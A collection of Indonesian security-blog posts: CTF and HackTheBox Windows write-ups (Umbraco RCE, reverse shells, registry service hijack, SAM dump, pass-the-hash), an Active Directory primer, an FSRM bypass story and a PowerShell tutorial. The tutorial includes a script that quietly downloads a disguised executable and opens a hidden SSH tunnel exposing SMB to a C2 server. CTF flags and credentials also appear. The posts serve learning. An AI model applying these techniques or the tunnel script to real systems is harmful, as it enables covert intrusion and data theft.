Pentest Day Bhitech Challenge

Host: 143.198.222.180
Machine: Windows
Level: Easy
Flag Format: bhitech{}

Deskripsi: Selamat datang di Pentest Day! Tantangan simpel, tapi seru. Tugasmu adalah mendapatkan dua flag yang tersembunyi di direktori user dan administrator. Gunakan segala cara dan skill yang kamu punya—dari eksploitasi sampai trik-trik cerdik lainnya!

Ingat, tujuan utamanya adalah eksplorasi dan belajar. Jangan merusak system yang ada! Semua yang kamu lakukan harus untuk tujuan edukasi.

Catatan: Jangan lupa fokus untuk eksploitasi dan seru-seruan—gak ada yang lebih keren dari belajar sambil nge-hack!

Good luck, happy hacking, and let’s grab those flags!

Dimana sama dengan chall pentesting lainnya yang mengharuskan untuk membaca flag yang disimpan pada server yakni terletak pada user dan administrator directory, dan disini kita diberikan suatu IP address server jadi langsung lakukan reconnaissance untuk phase awal

Terdapat beberapa service yang open diantarannya ada HTTP dan SMB yang bisa kita jadikan untuk foothold atau pijakan awal sebelum melakukan exploitation, dan jika dibuka pada service HTTP terlihat terdapat default halaman setelah installation Umbraco CMS dan juga terdapat form login untuk authentikasi

Disini kita tidak mempunyai valid credential untuk login, selanjutnya kita coba cek service berikutnya yaitu SMB server

Ternyata terdapat vulnerability SMB null session artinya SMB tersebut mengizinkan authentikasi tanpa credential jadi kita bisa akses sharename tanpa memasukkan username/password, dan jika diperhatikan ada sharename yang tidak biasa yaitu DataManager

Setelah diakses ditemukannya file XLS dengan nama member_account.xlsx, kemudian kita akan buka pada document viewer

Dokumen XLS tersebut berisikan informasi sensitive dari member Bhineka Tech yang juga menampilkan user, passsword beserta keahlian yang dimiliki beberapa member tetapi uniknya user dengan ID 3 berbeda dari yang lain yakni user tersebut menggunakan email dan jika kita lihat lagi pada login Umbraco diatas terdapat placeholder pada input username yaitu “Your username is usually your email” yang mengindikasikan jika username berupa email address, langsung saja kita coba login

Berhasil masuk dashboard Administrator, dan langkah selanjutnya kita cek version dari CMS umbraco yang digunakan

Versi yang digunakan yaitu 7.12.4 dan jika kita melihat pada exploit database menggunakan searchsploit

Ada vulnerability pada Umbraco versi 7.12.4 yaitu Remote Code Execution / RCE dengan kategori Authenticated yang berarti harus mempunyai privilege minimal untuk masuk dashboard, karena sudah didapatkan sebelumnya sekarang kita mulai untuk tahapan exploitation

Terlihat berhasil melakukan code execution artinya exploit berhasil dan jika di inputkan beberapa command batch script dasar akan menampilkan output yang sesuai.

Karena tidak mungkin untuk melakukan command satu persatu dan bolak balik exploit jadi disini kita akan generate binary executable untuk reverse shell menggunakan msfvenom

Karena casenya disini public server jadi kita melakukan generate binary reverse shell dengan listener yang di set ke IP VPS atau jika tidak mempunyai VPS bisa juga melakukan tunneling atau port forwarding menggunakan ngrok dan semacamnya

sebelumnya aku sudah aktifkan python http server di port 8000 pada VPS jadi disini kita tinggal download binary di server target menggunakan certutil yang akan disimpan didalam temporary directory dalam case windows ada di C:/windows/temp, kemudian kita execute binary jadi tinggal dipanggil full pathnya otomatis akan ter-eksekusi

Reverse shell berhasil dengan listener di port 9999, selanjutnya kita baca user flag pada directory users dan dalam hal ini ternyata user yang ada diserver menggunakan username rama

User flag : “bhitech{KuL0_T14nG_J4W1}”

Privilege Escalation

Selanjutnya kita diminta untuk membaca flag pada Administrator directory yang tentu saja akan access denied karena privilege user yang kita dapatkan merupakan Service Account yang tidak memiliki akses pada directory Administrator, jadi disini kita akan melakukan privilege escalation atau meningkatkan hak akses.

Sebenarnya ada banyak cara yang digunakan untuk enumeration pada tahapan post-exploitation pada windows sendiri, tapi disini kita akan automation saja menggunakan winpeas

https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md

Jadi winpeas sendiri berfungsi untuk identifikasi service, component, kernel, scheduled task, registry dan lain lain jika terdapat suatu vulnerability ataupun misconfiguration yang bisa dimanfaatkan untuk melakukan Privilege Escalation

Download winpeas entah dengan menggunakan utility apapun bisa cURL ataupun certutil lalu jalankan

Disini ditemukan suatu service dengan nama BhitechService yang dimana Authenticated Users atau user dalam machine tersebut dapat melakukan full control pada registry yang dimana ini sangat berbahaya karena attacker bisa mengganti binary executable pada registry service tersebut dengan malicious atau executable berbahaya

Seknarionya disini kita akan melakukan generate ulang binary reverse shell menggunakan msfvenom dengan listener port 9000, lalu kita ubah ImagePath dari registry BhitechService dengan binary reverse shell yang kita buat jadi saat service di restart otomatis akan dieksekusi sebagai NT/System

Oke jadi disini menggunakan reg add yaitu command registry bawaan windows untuk replace binary ImagePath registry ke binary reverse shell yang kita buat, disini berhasil karena dari hasil enumeration dari winpeas Authenticated Users mempunyai full control pada registry BhitechService

Sekarang kita coba restart service menggunakan command net start BhitechService dan jangan lupa aktifkan netcat pada port 9000 yang kita buat tadi untuk dijadikan sebagai listener

Untuk message dari output net start bisa dihiraukan yang terpenting kita berhasil mendapatkan shell sebagai NT/System atau privilege tertinggi pada windows machine

Sekarang kita baca flagnya pada directory Administrator

Root flag : bhitech{G0tt_Acc3ss_adm1n_m4TuR_NuWun_s4ng3t}

Challenge solved rek, dan untuk tambahan sebenarnya masih ada teknik privilege escalation lain yang bisa digunakan karena casenya disini kita mendapatkan akses ke service account dan mempunyai 2 privilege penting yaitu SeAssignPrimaryTokenPrivilege dan SeImpersonatePrivilege yang bisa dimanfaatkan untuk melakukan token impersonation dan mendapatkan akses ke NT/System karena terlalu panjang mungkin akan dibahas lain kali jadi itu saja semoga bermanfaat.

Artikel Windows Pentesting Bhitech – Write Up pertama kali tampil pada Bhineka blog.

Jadi apasih itu Active Directory ? mungkin banyak dari kalian ada yang udah tau atau ada yang masih asing mendengar istilah Active Directory jadi daripada bingung ayo kita bahas

Active Directory ini bisa dikatakan suatu service berbasis direktori yang digunakan untuk mengelola resource dan infrastruktur dengan cara yang terstruktur. Maka dari itu Active Directory ini banyak di implementasikan pada perusahaan ataupun organisasi yang memiliki banyak komputer dan sumber daya karena menggunakan Active Directory ini memudahkan Administrator melakukan management maupun konfigurasi dengan cara terpusat/centralized.

Dalam Active Directory semua resource/sumber daya direpresentasikan menjadi suatu object dan object ini mencakup server, printer, komputer, domain, group dan user account. semua object ini akan dikelola oleh ADDS(Active Directory Domain Service) yang merupakan inti dari Active Directory itu sendiri. ADDS ini merupakan server yang mengatur semua konfigurasi dan rule/aturan resource pada jaringan didalam AD seperti keamanan, policy, permission dsb.

Lalu ada yang namanya Domain Controller yaitu merupakan server fisik atau computer yang menjalankan service Active Directory, dengan kata lain Domain Controller ini bisa berupa hardware(server fisik) maupun virtual machine.

Dan tidak kalah pentingnya, pada active directory terdapat 2 konsep untuk identifikasi yaitu SPN dan UPN, gampangnya UPN itu merupakan identitas unik pada user dalam active directory yang berguna untuk mengenali dan identifikasi user contohnya <username>@<domain> atau xpl0dec@bhitech.corp sementara itu SPN digunakan untuk mengenali service / layanan pada Active Directory yang menggunakan kerberos(akan kita bahas nanti) dengan contoh <service>/<hostname>:<port> atau MSSQL/bhitech:1433 disini kita mencontohkan dengan DB mssql dengan hostname bhitech di port 1433

Cara Kerja Active Directory

Dalam Active Directory untuk mengatur object object di dalamnya terdapat struktrur hierarki dimana struktur hierarki ini mencakup komponen penting diantarannya:

Domain : Direpresentasikan sama dengan domain name yang ada pada internet dengan menggunakan .(titik) seperti abc.com, bhitech.corp tetapi pengertian lebih luasnya domain ini digunakan untuk mengelompokkan object pada Active Directory, seperti yang kita bahas sebelumnya object itu mencakup user, group, printer, computer dan sumber daya lain

Organizational units(OUs) : OUs ini cukup kompleks karena digunakan untuk mengatur dan mengelola object object pada Active Directory, sebagai contoh sederhana pada sebuah perusahaan pastinya memiliki banyak departement dan kita ambil 2 sebagai contoh yaitu marketing dan IT jadi fungsi OUs ini akan membagi hak akses dimana setiap departement akan diberikan OU misalkan OU marketing hanya diberikan akses untuk mengelola ke service yang menyediakan penjualan dan pembelian sementara OU IT diberikan mengelola akses ke server maupun Domain Controller

Forest : Forest ini merupakan gabungan dari satu atau lebih domain dan domain bisa saling terhubung dan berbagi resource seperti pada gambar diatas yaitu abc.com bisa sharing directory dengan xyz.com begitupun sebaliknya

Tree : Pada gambar diatas tree bisa kita sebut sebagai subdomain yaitu hierarki domain yang menggunakan namespace yang sama seperti abc.com yang memiliki tree asia.abc.com

Group Policy Objects (GPOs) : Merupakan suatu aturan pada active directory yang diberikan kepada user sebagai contoh kita bisa memaksa user mengganti password sebulan sekali atau password user harus lebih dari 8 karakter menggunakan GPOs

Global Catalog : Secara sederhana sebuah database yang menyimpan semua informasi terkait domain pada suatu forest

Trust Relationship : Dimana kita ingin menghubungkan atau berbagi resource lintas domain dari forest yang berbeda

Protokol dan Authentication

Active Directory menggunakan banyak protocol untuk keperluan fungsionalitas, authentication maupun authorization diantara lain ada LDAP, SMB, RPC, kerberos. Dan disini untuk keperluan pentesting kita akan membahas beberapa protokol yang perlu kalian diketahui

LDAP: LDAP(Lightweight Directory Access Protocol) sendiri merupakan suatu protokol yang dipakai untuk mengakses dan mengelola data pada active directory

Jadi saat user atau service akan berkomunikasi dengan Active Directory user tersebut perlu melakukan serangkaian query pada LDAP protocol yang didalam LDAP sendiri terdapat banyak informasi mengenai object yang disimpan oleh Active Directory dan dapat kita akses menggunakan LDAP query. LDAP menggunakan TCP connection dan port defaultnya yaitu 389 dan 636(dengan tambahan SSL/TLS)

SMB : Protocol smb digunakan untuk berbagi data dan file antar server pada jaringan, jadi menggunakan SMB kita bisa sharing directory yang berguna agar server lain dapat mendownload/upload pada server yang menjalankan SMB dan port default SMB ada di 445

RPC : RPC atau Remote Procedure Call yang berfungsi untuk komunikasi antar object di jaringan yang pada Active Directory RPC berguna untuk meminta suatu layanan ke layanan pada server lain dalam domain. Secara konsep hampir mirip dengan REST API tapi dengan arsitektur yang berbeda yakni dalam RPC kita bisa melakukan fungsi pada server lain yang seolah olah bersifat local

NTLM : Windows New Technology LAN Manager merupakan suatu protokol yang digunakan untuk authentikasi pada operating system windows, dan sebenarnya NTLM ini protokol lama yang sekarang sudah digantikan oleh kerberos karena dianggap sudah usang dan memiliki masalah security tapi meskipun itu masih banyak digunakan hingga sekarang

Cara kerjanya cukup sederhana yang disebut Challenge-Response yaitu pertama client meminta authentikasi ke server dan jika authentikasi valid maka server melakukan response “challenge” berupa nonce(angka acak) yang kemudian dikirimkan kembali pada client lalu client me-response dengan hash dari challenge yang diberikan server serta di gabungkan dengan hash password dari client

Kerberos: Kerberos sekarang ini sudah menjadi protocol authentikasi default pada Active Directory dan pada mekanismenya sendiri juga lebih kompleks

Kita perlu mengerti beberapa istilah untuk memahami komunikasi kerberos pada gambar diatas yaitu terkait dengan ticketing yang sangat penting kita pahami sebagai pentester, beberapa istilah terkait:

KDC(Key Distribution Center) : Merupakan komponen penting pada protocol kerberos yaitu bertindak sebagai service pihak ketiga yang terpercaya(trusted)

AS(Authentication service) : Yaitu suatu layanan / service yang memvalidasi authentikasi client pada kerberos

TGT(Ticket Granting Ticket) : Merupakan ticket yang dikeluarkan oleh kerberos jika authentikasi awal berhasil

TGS(Ticket Granting Server) : Merupakan komponen pada authentikasi kerberos yang berfungsi mengeluarkan ticket untuk mengakses layanan tertentu

Setelah kita tau istilah-istilah penting pada kerberos sekarang kita bahas mekanisme protocolnya

1. Client melakukan authentikasi kerberos dan meminta TGT ke AS
2. Jika valid maka AS akan menerbitkan TGT dan TGT diberikan pada client
3. Lalu client kembali melakukan request ST(Service Ticket) pada kerberos TGS dengan membawa TGT
4. jika TGT valid maka TGS akan memberikan ST pada client
5. ST(Service Ticket) ini kemudian dipakai untuk akses ke service tertentu pada active directory seperti file server, email dsb

Penutup

Disini kita sudah belajar mengenai konsep Active Directory dan berguna untuk keperluan pentesting yang mungkin akan aku bahas pada artikel selanjutnya, dan yang perlu ditekankan disini yaitu memiliki fundamental tentang system atau arsitektur itu sangat penting sebelum kita melangkah ke sisi security dan keamanan apalagi topik yang kompleks seperti Active Directory ini jadi semoga saja artikel ini dapat mudah dipahami tentunya semoga bermanfaat juga dan happy hacking, sekian.

“Learning never exhausts the mind.” -Leonardo da Vinci

Artikel Kenalan dengan Active Directory pertama kali tampil pada Bhineka blog.

Disini aku mencoba beberapa pendekatan dan mengira ini masalah permission directory, karena disini mendapatkan privilege sebagai administrator mudah saja untuk mengubah permission pada directory

Melakukan reverse shell connection dan melihat permission directory sempat bingung karena tidak ada pembatasan permission pada directory xampp di satu sisi untuk file dengan extenstion lain yang tidak berbahaya seperti .txt, .jpg dan semacamnya itu bisa dilakukan write

Berfikir sejenak dan terfikir menjalankan nmap untuk melihat service yang running.

Hoki sekali port 3389 RDP terbuka, karena kebanyakan windows server semacam ini menggunakan relay untuk menerima request yang masuk dari public network dan jarang sekali melakukan port forwarding 3389 melalui relay yang dijadikan reverse proxy

Langsung saja login RDP, karena privilege yang didapatkan yakni Administrator kita dengan mudah bisa membuat user baru menggunakan command net user

oke masuk, hal pertama yang ku lakukan yaitu langsung membuka console powershell dengan hak Administrator dan mencoba untuk masuk pada system account melalui PsExec. NT/SYTEM itu merupakan permission tertinggi pada windwos

Terlihat jika pada directory C:\inetpub kita bisa execute dan write .exe file

Wah tetap saja padahal disini kita sudah memakai system account dan juga owner directory itu milik system, ada yang ga beres sepertinya

Program yang terinstall juga sangat sedikit yang hanya dipakai keperluan deployment dan tidak menunjukkan adanya antivirus third-party software

Dan disini aku langsung coba cek dari event log pada windows untuk identifikasi lebih lanjut

Indikasi dari event log application terdapat warning dengan deskripsi file group which is not permitted on the system. dan pada bagian source yang berasal dari service SRMSVC

SRMSVC itu merupakan source event log yang berasal dari FSRM(File Server Resource Manager), FSRM sendiri dipakai untuk management filesystem pada windows server. sekarang kita lihat konfigurasi registry dari SRMSVC pada path HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srmsvc\

Tidak ada konfigurasi khusus yang terdapat pada hive registry SRMSVC dan disini sempat stuck sedikit dan lalu ingat jika SRMSVC merupakan source log pada FSRM yang harusnya konfigurasi terletak pada service FSRM itu sendiri

Jika di lihat dari basic setting FSRM tidak ada rules khusus tapi jika kita lihat pada konfigurasi file screen dengan command Get-FsrmFileScreen

ya itu dia, jadi disini ada rule khusus untuk ignore atau menolak file berbahaya dengan keterangan Block Executable Files jadi disini bisa langsung saja dilakukan disable maupun remove atau kita juga bisa melihat rule FSRM ini pada server manager

Disini langsung ku lakukan remove rule menggunakan powershell

Setelah itu lalu kita coba write .php file pada directory xampp

Dan itu berhasil, terlihat disini tidak ada error dan kita bisa menulis suatu php file pada directory. Mungkin cukup disini cerita singkat ku pada saat melakukan pentesting dan disini aku hanya sekedar sharing yang mungkin berguna saat kalian mengalami hal yang sama, sekian happy hacking guyss

“Tidak ada yang akan berhasil kecuali kau melakukannya.” -Maya Angelou

Artikel Mengenal cFSRM pada windows untuk menyulitkan heker pertama kali tampil pada Bhineka blog.

Powershell sendiri dibangun diatas framework .NET dan Jika pada operating system unix-like kita kenal dengan bash script yang yang merupakan command shell berbasis text, tidak seperti shell script lain uniknya pada powershell sendiri menggunakan shell yang berbasis object jadi semua command pada powershell dianggap sebagai suatu object, menarik bukan ?

Oh iya powershell sendiri mulai diperkenalkan pada windows XP yang dimana dulu powershell hanya bisa dipake pada windows environment tetapi sekarang kita bisa juga menginstall powershell pada operating system lain karena microsoft merilis powershell sebagai opensource.

Karena powershell itu tersedia secara default pada operating system windows jadi mempelajari powershell sangat berguna saat kita mendapatkan initial access pada windows machine jadi sesuai topik ini yaitu Powershell for hacking jadi kita akan belajar basic command serta melihat command apa saja yang sering dipakai pada powershell pada saat melakukan hacking/post-exploitation

Sebelum kita memulai kita perlu mengenal yang namanya cmdlet, cmdlet merupakan namming pattern yang berisi kata kerja dan kata benda pada suatu command jadi misalkan command Get-ChildItem yang digunakan untuk listing directory jadi Get merupakan kata kerja sementara ChildItem merupakan kata benda. cmdlet itu ada banyak sekali tetapi kita tidak perlu menghafalnya cukup kita perlu menginggat 2 command saja yaitu Get-Command yang digunakan untuk menampilkan semua atau spesifik nama dari cmdlet pada powershell dan command kedua ada Get-Help yang berfungsi untuk melihat detail dari cmdlet tersebut seperti argument dan penggunaan pada command cmdlet

Ada 3 CommandType yang ada pada powershell dimana di klasifikasikan menjadi 3 yaitu Alias, Function dan terakhir yang kita bahas tadi yaitu cmdlet jadi mari kita bahas:

Alias : Bisa dibilang alias ini seperti singkatan dari cmdlet dan function dari powershell dan kita bisa mudah melihatnya menggunakan command get-alias

beberapa command alias mirip dengan bash seperti alias cat untuk membaca file yang aslinya merupakan cmdlet dari Get-Content lalu ada alias cd dan chdir untuk berpindah directory yang juga sebenarnya merupakan command cmdlet dari Set-Location

Function : function ini sebenernya juga masuk ke cmdlet tetapi kita juga bisa melakukan custom function pada powershell atau yang dikenal dengan user defined function

Disini kita coba definisikan fungsi InfoTanggal-dan-IpAddress yang hanya menampilkan informasi tanggal dan IP Address pada local computer dan pada gambar kita bisa melihat pada blok fungsi kita memanggil cmdlet Get-Date dan alias gip yang memfilter hanya untuk menampilkan IP address

Cmdlet: Seperti yang dibahas sebelumnya, cmdlet berisi suatu perintah dasar seperti menampilkan directory, berpindah directory, membuat file, membuat folder dan banyak lagi ya, contoh cmdlet yang sering digunakan:

• Get-ChildItem : untuk listing directory
• Set-Location: Untuk berpindah directory
• Get-Content : Untuk membaca file
• Add-Content : untuk membuat file / append string jika file sudah ada
• Set-Content : Untuk membuat file / modifikasi string jika file sudah ada
• Remove-Item : menghapus file / directory
• Rename-Item : rename file / directory
• Copy-Item : salin file / directory
• Move-Item : pindahkan file / directory

Sebenarnya masih banyak lagi ya cuman kalian bisa explore sendiri untuk lebih lengkapnya, nah disini misalkan kasusnya kita tidak mengerti bagaimana cmdlet Add-Content bekerja kita bisa mudah menggunakan command Get-Help Add-Content untuk menampilkan informasi bantuan pada cmdlet tersebut

Nah ditampilkan informasi argument apa saja yang dibutuhkan, tenang saja kita tidak membutuhkan semua argument hanya argument yang wajib/required kita gunakan yaitu -Path yang merupakan nama file dan -Value isi pada string dan jika kurang jelas kita bisa melihat di dokumentasi microsoft pada link yang sudah disertakan pada output atau bisa juga menggunakan command Get-Help nama_cmdlet -Full

Disini sangat detail karena disertakan hingga penjelasan dari parameter yang required dan opsional jadi langsung saja kita coba

Disini kita memakai cmdlet Add-Content untuk membuat file serta kita coba baca dari file yang kita buat memakai cmdlet Get-Content, semudahh itu kan

Setelah kita tau cmdline, alias dan function sekarang kita akan membahas pipeline, nah apa itu ?? jadi pipeline itu suatu cara pada powershell yang digunakan untuk mengarahkan output ke command lain menggunakan satu baris command dan hal ini berguna misalkan untuk sorting string, mencari string tertentu dalam file/output, memfilter output, melakukan operasi pada string yang dipilih dan masih banyak lagi.

Sama seperti pada bash, pipeline pada powershell juga menggunakan special character |(pipe) tetapi karena powershell semua command di respresentasikan sebagai object jadi kita bisa melakukannya lebih mudah

Kita mulai dengan cmdlet Get-Service yang berguna untuk menampilkan semua service pada computer

Dan disini kita hanya akan memfilter nama pada service jadi kita bisa dengan mudah menggunakan pipeline dan diikut dengan cmdlet Select-Object

Sangat mudah bukan, dimana kita melakukan Select-Object Name dimana Name merupakan parameter Name diambil dari column dari output Get-Service, Nah sekarang kita akan menampilkan hanya service yang memiliki status stop / tidak running kita dengan mudah menggunakan Where-Object

Output hanya menampilkan service dengan status stopped dan disitu kita menggunakan Where-Object diikuti dengan {$_.Status -eq “Stopped”} yang dimana hal ini merupakan rules syntax dari powershell sendiri dan $_.Status artinya kita mengambil column status dan -eq merupakan operasi komparasi sama dengan dan diikuti dengan string “Stopped”

Kita juga bisa menggunakan lebih dari 2 pipeline

Dalam kasus ini kita akan memilih service yang berstatus “Stopped” dan diikuti dengan Select-Object Name artinya kita hanya memanggil nama dari service pada output yang berarti menampilkan nama service dengan status Stopped

Contoh selanjutnya kita akan mulai bekerja dengan file yaitu menampilkan file pada current path yang lebih baru dari 30 hari sebelumnya, kita tahu jika operasi listing menggunakan Get-ChildItem

Sebelum kita memulai kita perlu tau dulu spesifikasi dari command Get-ChildItem dimana kita bisa melakukan scanning rekursif menggunakan argument -Recurse dan kita juga bisa melihat argument yang bersifat required dan bukan.

Selanjutnya kita bisa memanfaatkan pipeline untuk ini

Disini command-nya sangat sederhana pertama kita recursif scan menggunakan -Recurse dan -File merupakan argument yang hanya digunakan untuk melakukan scanning pada file bukan directory dan kita lakukan pipeline dengan where-object artinya kita akan melakukan compare dimana $_.LastWriteTime merupakan column timestamp dan -ge merupakan operasi lebih dari diikuti dengan fungsi (Get-Date).AddDays(-30) yang berarti kita mengambil tanggal sekarang dikurangi 30 hari dan lanjut melakukan select column dimana disitu kita hanya akan menampilkan fullpath dengan menggunakan argument Fullname

Contoh terakhir kita akan melihat kemampuan cmdlet untuk melihat dan melakukan konfigurasi system

Kita bisa dengan mudah menampilkan semua subkey registry HKCU menggunakan Get-ChildItem

Kita juga bisa melihat value dari hive registry menggunakan cmdlet Get-ItemProperty diikuti path dari registry key-nya

Disini kita bisa melihat autorun program yang dijalankan pada saat selesai booting diantaranya ada openvpn-gui.exe, discord, opera.exe dan lainnya ya

Dan kita bisa menghapus salah satu value dari registry tersebut menggunakan Remove-ItemProperty, disini kita akan mencoba untuk menghapus discord agar tidak dijalankan saat computer dinyalakan

Pada gambar ini, terlihat kita menghapus value dengan nama discord jadi sekarang discord tidak lagi menjadi autorun program

Powershell sendiri sebenarnya suatu utility yang sangat powerfull entah dari segi sysadmin, configuration, automation maupun pentesting karena kita bisa melakukan apapun pada machine hanya dengan input suatu command dan juga kita bisa membuat script powershell pada satu file dengan extension .ps1, jadi kita akan mencoba coding untuk menjalankan executable jadi siapkan text editor disini kita akan menggunakan vscode

oke kita bedah scriptnya, jadi pada script powershell ini digunakan untuk menjalankan suatu executable yaitu putty, putty adalah suatu aplikasi yang dipake untuk keperluan remote jaringan dan kita bisa menggunakan putty untuk komunikasi pada protocol ssh, ftp, smb dan protocol yang digunakan untuk remote login lainnya

$processName = "microsoft"

$tempDir = [System.IO.Path]::GetTempPath()
$exePath = Join-Path -Path $tempDir -ChildPath "microsoft.exe"

$downloadUrl = "http://[redacted]/putty.exe"

Sama seperti programming pada umumnya, kita bisa mendeklarasikan variable pada powershell disini kita inisialisasi variable seperti ProcessName, tempDir, exePath dan downloadUrl

function IsProcessRunning {
    param (
        [string]$name
    )
    $process = Get-Process | Where-Object { $_.ProcessName -eq $name }
    return $process -ne $null
}

if (-not (IsProcessRunning $processName)) {

    if (-not (Test-Path $exePath)) {
        Write-Host "$exePath Downloading"
        Invoke-WebRequest -Uri $downloadUrl -OutFile $exePath
        Write-Host "Success"
    }
    

    $args = @("-N", "-l", "guest", "-pw", "admin12345", "-R", "1337:localhost:445", "[redacted_host]", "-hostkey", "SHA256:xbI5/Mcj2KrXg3ykreniRYhZUs9IQGb/secret")
    Start-Process -FilePath $exePath -ArgumentList $args -WindowStyle Hidden
    Write-Host "$processName not running, $exePath"
} else {
    Write-Host "$processName running."
}

Pada fungsi IsProcessRunning berguna untuk melakukan filter process dengan 1 argument yang diambil dari variable processName dengan nama microsoft dan selanjutnya ada if statement

if (-not (IsProcessRunning $processName))

Artinya kita identifikasi apakah process microsoft itu running dan jika belum running maka dilakukan komparasi kedua apakah ada file pada $exePath yang dimana variable $exePath merupakan temporary directory dan diikuti dengan nama file yaitu microsoft.exe jika tidak ada maka akan dilakukan download pada url yang mengambil pada variable $downloadUrl dan jika ada maka lanjut pada line berikutnya

Disini ada inisialisasi array pada variable $args yang merupakan argument pada cmdlet dari Start-Process dan diikut dengan argument -WindowStyle Hidden yang berarti process akan dilakukan pada background, jadi script ini berfungsi untuk melakukan SSH tunneling dimana pada host local melakukan port forwarding dari 445(smb) ke server c2 dengan port 1337 sehingga login smb pada local computer bisa dilakukan remote pada c2 server dengan port 1337.

Penutup

mungkin itu saja penjelasan fundamental mengenai powershell scripting, yang dimana memang powershell ini sangat usefull terlebih lagi di sisi cybersecurity saat melakukan pentesting/CTF pada windows machine dan semoga artikel ini bermanfaat dan bisa dijadikan refrensi untuk kedepannya.

“Orang bijak belajar ketika mereka bisa. Orang bodoh belajar ketika mereka dipaksa.” -Arthur

Refrensi:

https://learn.microsoft.com/en-us/powershell/scripting/learn/ps101/04-pipelines?view=powershell-7.4

https://learn.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7.4

https://www.techtarget.com/whatis/definition/cmdlet

https://juggernaut-sec.com/autorun-startup-registry-keys

Artikel Powershell for hacking, dasar command pada powershell pertama kali tampil pada Bhineka blog.

Diberikan suatu IP yaitu 10.10.11.35 langsung kita buka nmap untuk melakukan port enumeration

Disini ada beberapa service yang running, dari result banner grabbing ada port 88 yang menunjukkan kerberos karena tantangan ini menggunakan machine dengan OS windows bisa kita asumsikan jika machine ini menggunakan active directory karena kita melihat protocol LDAP juga terbuka

Mencoba melakukan SMB null session pada port 445

Disini berhasil karena output menampilkan ada beberapa sharename dan kita akan akses sharename yang sekiranya read/write dan setelah dicoba hanya sharename /HR yang dapat kita listing

ada satu file dengan nama Notice from HR.txt dan lakukan get pada SMB untuk download pada machine local kita

Terlihat ada string mencurigakan yaitu Cicada$M6Corpb*@Lp#nZp!8 karena jika kita lihat dari keterangannya bertuliskan default password

Disini kita akan melakukan user enumeration untuk mengetahui username yang ada pada machine tersebut dengan teknik RID bruteforce menggunakan crackmapexec

Dari output yang ditampilkan banyak sekali user pada machine tersebut, jadi kita bisa mem-filter dari output tersebut untuk kemudian dilakukan password spraying dari string yang kita dapatkan sebelumnya. Pertama kita masukan pada sebuah file result-rid.txt dengan semua output dari crackmapexec

dan setelah di filter menggunakan beberapa utility dari linux, output terlihat lebih rapi

Dari output yang didapatkan kita bisa menyimpan pada file, dalam kasus ini kita menyimpan pada file user.txt yang nantinya ini berguna untuk user list pada saat melakukan password spraying.

Salah satu user dengan username michael.wrightson mengindikasikan bahwa credential valid jadi langsung kita coba pada login pada SMB dan mengakses sharename DEV

Tapi disini menunjukkan masih access denied artinya user tersebut tidak memiliki access listing dan read pada sharename, oke kita coba pada protocol lain yaitu LDAP(ligth weight directory access protocol).

Melakukan enumeration users menggunakan ldapsearch dengan command:

ldapsearch -x -H ldap://10.10.11.35 -D ‘CICADA\michael.wrightson’ -w ‘Cicada$M6Corpb*@Lp#nZp!8’ -b “CN=Users,DC=cicada,DC=htb”

Pada user david orelious terdapat description yang menarik, jadi kita coba lagi pada SMB dari credential david.orelious yang didapatkan dari LDAP dan mengakses sharename DEV

Nah akhirnya berhasil, dan terdapat file dengan extenstion ps1 yang merupakan powershell script

Script-nya sangat sederhana dimana script ini digunakan untuk auto backup dan melakukan kompresi, teatapi lagi-lagi ada hal yang menarik yaitu script ini backup menggunakan user emily.oscars dan disana juga terdapat password untuk melakukan authentikasi

Karena ini windows machine kita coba melihat apakah protocol winrm pada port 5985 di enable

Disini port 5985 terbuka, jadi winrm sendiri berfungsi untuk melakukan management windows CLI dari jarak jauh atau remote, secara konsep hampir mirip dengan SSH tapi uniknya winrm menggunakan protocol HTTP. selanjutnya kita coba login pada winrm menggunakan evil-winrm dari credential emily.oscars yang didapatkan

Dan disini valid, kita juga berhasil mendapatkan flag untuk user.txt sekarang kita perlu privilege escalation atau meningkatkan hak akses ke Administrator untuk mendapatkan root flag

Saat mencoba melihat privilege pada user emily.oscars menggunakan command whoami /all, disitu terlihat jika privilege SeBackupPrivilege diaktifkan artinya user emily.oscars mampu melakukan backup data pada system, dimana hal ini berarti user tersebut mempunyai akses READ pada semua file jadi kita bisa memanfaatkan untuk membaca SAM(Security Account Manager) yaitu merupakan windows database berisi informasi krusial mengenai account yang ada pada system

Kita bisa memanfaatkan command reg query untuk mendapatkan file sam dan system dari registry lalu kita download pada machine local kita dengan command download

Setelah didapatkan pada machine local kita bisa extract informasi credential menggunakan impacket secretdumps

Terlihat output menunjukkan informasi account dari uid hingga hash dan juga pada informasi kita bisa melihat disitu ada account Administrators. Nah disini tidak ada plain-text password tetapi kita hanya mempunyai hash darisini kita bisa memakai teknik yang dikenal dengan Pass the Hash yang merupakan methode authentikasi menggunakan hash bukan plain-text password

Kita dengan mudah menggunakan evil-winrm dengan opsi -H di ikuti dengan hash-nya

Disini terlihat kita mendapatkan akses tertinggi yaitu Administrator dan juga kita berhasil mendapatkan root flag

Kesimpulan

Challenge ini sangat menarik dan dari sini kita bisa belajar mengenai beberapa teknik pada windows pentesting serta cara exploitasi, dan yang dipahami dari challenge ini untuk mendapatkan akses ke salah satu server/machine itu tidak selalu harus memerlukan celah seperti CVE ataupun zeroday tapi lebih menekankan ke misconfiguration karena human error itu selalu menjadi masalah utama dalam security. Mungkin itu saja WriteUp kali ini dan selamat belajar.

“Jika Kamu tidak sanggup menahan lelahnya belajar maka kamu harus sanggup menahan perihnya kebodohan” -Imam Syafi’i

Artikel WriteUp Cicada HackTheBox pertama kali tampil pada Bhineka blog.